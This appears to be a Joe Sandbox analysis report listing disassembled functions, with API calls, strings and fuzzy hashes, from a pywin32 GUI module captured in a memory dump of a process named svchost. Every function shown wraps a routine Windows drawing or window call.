                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB0CC0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 95threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetClientRect), ref: 6DAB0CD7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB0CF3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB0D02
                            • GetClientRect.USER32 ref: 6DAB0D13
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB0D1C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetClientRect,00000000), ref: 6DAB0D2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_ClientError@@Object_ParseRectRestoreSaveTupleWin_
                            • String ID: GetClientRect$O:GetClientRect$llll
                            • API String ID: 697045670-3788905939
                            • Opcode ID: e074399279241d07c05cdf739353b0364c96da793960a130a936368618c09dd9
                            • Instruction ID: 1ec8a2e39304250033380df45ca41a3fd3bd3523dea8e969af17a10f5c2dc5d1
                            • Opcode Fuzzy Hash: e074399279241d07c05cdf739353b0364c96da793960a130a936368618c09dd9
                            • Instruction Fuzzy Hash: FB21277650C3019FDB006B29CD84A7B3BB9FF86219F484728F98982161E335D967CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB21E0, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 76threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:ExtractIcon,?,?,?), ref: 6DAB2213
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB222F
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000000,00000000,00000000), ref: 6DAB2249
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2258
                            • SetLastError.KERNEL32(00000000), ref: 6DAB2262
                            • ExtractIconW.SHELL32(?,?,?), ref: 6DAB2274
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB227D
                            • GetLastError.KERNEL32 ref: 6DAB228A
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAB229A
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ExtractIcon,00000000), ref: 6DAB22A6
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$ErrorEval_LastThread$Arg_Error@@ExtractFreeIconParseRestoreSaveTupleWin_
                            • String ID: ExtractIcon$OOi:ExtractIcon
                            • API String ID: 3582158300-1497086784
                            • Opcode ID: cf2a3d64c9a6c3d01b07410b208ce7635cd77e4acea7d262ad69d68a4e4670a2
                            • Instruction ID: cf486c5228321fc9df7896305be203d16a7fb2337a276d5f3631a0e42dea1f0e
                            • Opcode Fuzzy Hash: cf2a3d64c9a6c3d01b07410b208ce7635cd77e4acea7d262ad69d68a4e4670a2
                            • Instruction Fuzzy Hash: 9B218C76408301AFCB01AF24DC48B6B7BB8FF85311F84892AF959D1131E731C56A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB50E0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38 ref: 6DAB510D
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB5147
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers,PtInRect), ref: 6DAB51BD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_ParseTuple$Err_Format
                            • String ID: %s: This param must be a tuple of four integers$%s: This param must be a tuple of four integers$OO:PtInRect$PtInRect$PtInRect$llll
                            • API String ID: 1055172171-732539440
                            • Opcode ID: ce610acfa3809c71cde4f9727b776a1213514602c2cc06d0dd245867293dcdfa
                            • Instruction ID: c73f994c89934b4aa9bf7ff5fa663a9f8b7ad3a244a9c3787c3997da5aa9e1e7
                            • Opcode Fuzzy Hash: ce610acfa3809c71cde4f9727b776a1213514602c2cc06d0dd245867293dcdfa
                            • Instruction Fuzzy Hash: 9321713540C205AFDB01DB54DC84EBB7BFCBF89208F088619F98992121E735D59BCB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB51D0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 74COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38 ref: 6DAB51FD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB5216
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB524D
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers,RectInRegion), ref: 6DAB52A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_ParseTuple$Err_FormatObject_U_object@@
                            • String ID: %s: This param must be a tuple of four integers$%s: This param must be a tuple of four integers$OO:RectInRegion$RectInRegion$RectInRegion$llll
                            • API String ID: 1273418297-2970479076
                            • Opcode ID: bf42bbc9744dec8968e78be01e344f4fc5ccb93500629293e64797c552e50bca
                            • Instruction ID: dd6c55ebcd2750846f3aa2f9e862036faa5a9d1078c961f5f88457d18b3e68d3
                            • Opcode Fuzzy Hash: bf42bbc9744dec8968e78be01e344f4fc5ccb93500629293e64797c552e50bca
                            • Instruction Fuzzy Hash: E3213C3540C202AFDB00DB58CC85BAB7BACAF85205F448569F99592122E731D95BCBA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB70F0, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 72COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38 ref: 6DAB7110
                            • PyArg_ParseTuple.PYTHON38(?,llll,?,?,?,?), ref: 6DAB714C
                            • PyErr_Format.PYTHON38(6E28ED8C,%s: This param must be a tuple of four integers,CreateEllipticRgnIndirect), ref: 6DAB7166
                            Strings
                            • llll, xrefs: 6DAB7146
                            • %s: This param must be a tuple of four integers, xrefs: 6DAB715A
                            • O:CreateEllipticRgnIndirect, xrefs: 6DAB70FF
                            • CreateEllipticRgnIndirect, xrefs: 6DAB71BC
                            • CreateEllipticRgnIndirect, xrefs: 6DAB7199
                            • %s: This param must be a tuple of four integers, xrefs: 6DAB71C1
                            • CreateEllipticRgnIndirect, xrefs: 6DAB7155
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_ParseTuple$Err_Format
                            • String ID: %s: This param must be a tuple of four integers$%s: This param must be a tuple of four integers$CreateEllipticRgnIndirect$CreateEllipticRgnIndirect$CreateEllipticRgnIndirect$O:CreateEllipticRgnIndirect$llll
                            • API String ID: 1055172171-2671796847
                            • Opcode ID: 468594351541a79d0ec65f7427a8f1b10098e7b64478679c375a75e78cf297c1
                            • Instruction ID: 32497eca0f0ae1c154f9df9580e72c5a3f20a88685ff8adce52b27cc1bfa15dd
                            • Opcode Fuzzy Hash: 468594351541a79d0ec65f7427a8f1b10098e7b64478679c375a75e78cf297c1
                            • Instruction Fuzzy Hash: E311C37680C3016FC600DB28EC84EAB37ACBF81219F484569F84592222E731D55B9AF3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB1990, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 101threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oiii:PeekMessage,?,?,?), ref: 6DAB19CD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?,?,?,?,?,?,?), ref: 6DAB19E9
                            • PyEval_SaveThread.PYTHON38(?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB19F9
                            • PeekMessageW.USER32 ref: 6DAB1A16
                            • PyEval_RestoreThread.PYTHON38(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB1A1F
                            • Py_BuildValue.PYTHON38(6DAC02DC,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB1A2B
                            • ?PyWinObject_FromMSG@@YAPAU_object@@PBUtagMSG@@@Z.PYWINTYPES38(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB1A38
                            • _Py_Dealloc.PYTHON38(6E294BE9,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAB1A56
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Object_ThreadU_object@@$Arg_BuildDeallocFromG@@@MessageParsePeekRestoreSaveTupleUtagValue
                            • String ID: Oiii:PeekMessage
                            • API String ID: 2399918275-502876712
                            • Opcode ID: 466c8a2bbc3bed914f10c4518f5756e2c42e832cc58452c6a19a68c28a481de9
                            • Instruction ID: 9ee3c4e247dbce3d37de9e7f0c9c4e881ea0a2976472a1ef8e97355bfd2f1a5b
                            • Opcode Fuzzy Hash: 466c8a2bbc3bed914f10c4518f5756e2c42e832cc58452c6a19a68c28a481de9
                            • Instruction Fuzzy Hash: 4E31F276908301AFDB009B64CC84B7BBBB9FF85225F484B29FD59C2121E731D9578B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB29F0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 99threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:SetWindowOrgEx,?,?,?), ref: 6DAB2A12
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2A2E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2A3D
                            • SetWindowOrgEx.GDI32(?,?,?,?), ref: 6DAB2A56
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB2A5F
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWindowOrgEx,00000000), ref: 6DAB2A72
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_Window
                            • String ID: Oii:SetWindowOrgEx$SetWindowOrgEx
                            • API String ID: 1198228836-3175433460
                            • Opcode ID: 4b105227a30b7efd5b4498bceb615d777f05eee48385a465fb4c3c78a6ab8882
                            • Instruction ID: e16cbab6d4927a7d5668c287bd5b16a8a337430363591a9b070aa8183a3c2820
                            • Opcode Fuzzy Hash: 4b105227a30b7efd5b4498bceb615d777f05eee48385a465fb4c3c78a6ab8882
                            • Instruction Fuzzy Hash: DD31287650C201AFDB106F28CC84A7B7BBDFF85215F884629F948C2122E731C8579BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB6DC0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 99threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Of:SetMiterLimit,?,?), ref: 6DAB6DDD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6DF9
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6E08
                            • SetMiterLimit.GDI32(?,?,?), ref: 6DAB6E25
                            • PyEval_RestoreThread.PYTHON38(00000000,?,?), ref: 6DAB6E2E
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetMiterLimit,00000000), ref: 6DAB6E41
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@LimitMiterObject_ParseRestoreSaveTupleWin_
                            • String ID: Of:SetMiterLimit$SetMiterLimit
                            • API String ID: 1851932747-1262099783
                            • Opcode ID: 323162f7fea57f514c075195bbdb41d462b74208b2c29c027b248a73450c7a75
                            • Instruction ID: e2e208890efa16728355c31f86b81fbb2991128e3a65c2465435d1f3feea7926
                            • Opcode Fuzzy Hash: 323162f7fea57f514c075195bbdb41d462b74208b2c29c027b248a73450c7a75
                            • Instruction Fuzzy Hash: B531287690C3019FDB00AF29CC84A7B7BBDFF81215F484725F84882261F731985B8BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB2C20, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 99threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:SetViewportOrgEx,?,?,?), ref: 6DAB2C42
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2C5E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2C6D
                            • SetViewportOrgEx.GDI32(?,?,?,?), ref: 6DAB2C86
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB2C8F
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetViewportOrgEx,00000000), ref: 6DAB2CA2
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleViewportWin_
                            • String ID: Oii:SetViewportOrgEx$SetViewportOrgEx
                            • API String ID: 552355028-3154955923
                            • Opcode ID: 25104f96ace26b459a60f72e263dd62e4082690589cb7949a6c231dc6783ae09
                            • Instruction ID: 1c7aeadb27cb5dee13e438fd70fb345e004466bf0c4c24c0b37835fe3f620267
                            • Opcode Fuzzy Hash: 25104f96ace26b459a60f72e263dd62e4082690589cb7949a6c231dc6783ae09
                            • Instruction Fuzzy Hash: FE31F67650C201AFDB016F28DC84A7B7BBDFFC5225F484625F949C2122E731C8579BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB6CB0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 94threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetMiterLimit), ref: 6DAB6CC7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB6CE3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB6CF2
                            • GetMiterLimit.GDI32(?,?), ref: 6DAB6D03
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB6D0C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetMiterLimit,00000000), ref: 6DAB6D1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@LimitMiterObject_ParseRestoreSaveTupleWin_
                            • String ID: GetMiterLimit$O:GetMiterLimit
                            • API String ID: 1851932747-3050311339
                            • Opcode ID: 40288d28a2f19d12481f2e74dcb7868337f5bd4230e6ff67bfa95620282e8317
                            • Instruction ID: b2fa8c7f57159b99847491c77cd79a7f5d5ed8bb1597180c3c13cee3dac685dc
                            • Opcode Fuzzy Hash: 40288d28a2f19d12481f2e74dcb7868337f5bd4230e6ff67bfa95620282e8317
                            • Instruction Fuzzy Hash: 6C21E3769083015FCB009F28EC88B7A7B79FF82215F4C4325FD05C2261E731896BCAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB44B0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 93threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetCurrentPositionEx), ref: 6DAB44C7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB44E3
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB44F2
                            • GetCurrentPositionEx.GDI32(?,?), ref: 6DAB4503
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB450C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetCurrentPositionEx,00000000), ref: 6DAB451F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_CurrentError@@Object_ParsePositionRestoreSaveTupleWin_
                            • String ID: GetCurrentPositionEx$O:GetCurrentPositionEx
                            • API String ID: 427357298-1184994226
                            • Opcode ID: 268692fa714e80075dd2228c42854f9cd658993145f796933cd66069ab7decd1
                            • Instruction ID: f2bfc7b2476b10351c709ef11f85bcf13a05c62771f233b36903732df603c7fe
                            • Opcode Fuzzy Hash: 268692fa714e80075dd2228c42854f9cd658993145f796933cd66069ab7decd1
                            • Instruction Fuzzy Hash: 1F212B7690C6019FDB005F28DC84B7A3B79FF85229F484725F945C2122F7318C6786A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB28E0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 93threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWindowOrgEx), ref: 6DAB28F7
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2913
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB2922
                            • GetWindowOrgEx.GDI32(?,?), ref: 6DAB2933
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB293C
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetWindowOrgEx,00000000), ref: 6DAB294F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParseRestoreSaveTupleWin_Window
                            • String ID: GetWindowOrgEx$O:GetWindowOrgEx
                            • API String ID: 1198228836-4233984523
                            • Opcode ID: c6187b831807ae679702a224e099785ec7e38c3bbbc0c8add640d08ad8b45a8d
                            • Instruction ID: 223279b7a68af19b87740e902821e7c179ff2cfe74f17d69451cd471d0edffd2
                            • Opcode Fuzzy Hash: c6187b831807ae679702a224e099785ec7e38c3bbbc0c8add640d08ad8b45a8d
                            • Instruction Fuzzy Hash: 4721F87650C3019FDB005F29CC88B7B7B7DFF81225F480625F95982122E735C9679BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB0580, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 86threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:GetCaretPos), ref: 6DAB058C
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB059F
                            • GetCaretPos.USER32(?), ref: 6DAB05AC
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB05B5
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetCaretPos,00000000), ref: 6DAB05C8
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_CaretError@@ParseRestoreSaveTupleU_object@@Win_
                            • String ID: :GetCaretPos$GetCaretPos
                            • API String ID: 575990338-478324737
                            • Opcode ID: d0a23dcd29c3098baa4ef0dc8a824352c6067dfcc1af7b21151cde82c87fb765
                            • Instruction ID: 0f9d2bad00606e946091554cabf3bad6d5b6c1504c1842566ec7a9c57bea8f80
                            • Opcode Fuzzy Hash: d0a23dcd29c3098baa4ef0dc8a824352c6067dfcc1af7b21151cde82c87fb765
                            • Instruction Fuzzy Hash: 072108769083019FCF005F29AC99A7A3B79FFC2226F484325F91582111F731896BD6A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB75D0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 86threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:GetCursorPos), ref: 6DAB75DC
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB75EF
                            • GetCursorPos.USER32(?), ref: 6DAB75FC
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB7605
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetCursorPos,00000000), ref: 6DAB7618
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_CursorError@@ParseRestoreSaveTupleU_object@@Win_
                            • String ID: :GetCursorPos$GetCursorPos
                            • API String ID: 647088857-1774093815
                            • Opcode ID: b6ab1672e2e683245ac7df755b80885377fb20edd974edfd2aa1a5df3874b60d
                            • Instruction ID: a16373d084d8d7a7bbd2c71e655e8d1f88d192ba14e7e241d10f0f53f164e947
                            • Opcode Fuzzy Hash: b6ab1672e2e683245ac7df755b80885377fb20edd974edfd2aa1a5df3874b60d
                            • Instruction Fuzzy Hash: C021D876D083019FCF015F6DAC99A6A3B79FF82227F4C4325F91582251E731885BD6A2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAB9E0, Relevance: 22.8, APIs: 11, Strings: 2, Instructions: 82COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOO,?,?,?), ref: 6DAABA03
                            • ?PyWinObject_AsDEVMODE@@YAHPAU_object@@PAPAU_devicemodeW@@H@Z.PYWINTYPES38(?,?,00000001), ref: 6DAABA21
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000000,00000000), ref: 6DAABA42
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,?,00000001,00000000), ref: 6DAABA58
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAABA65
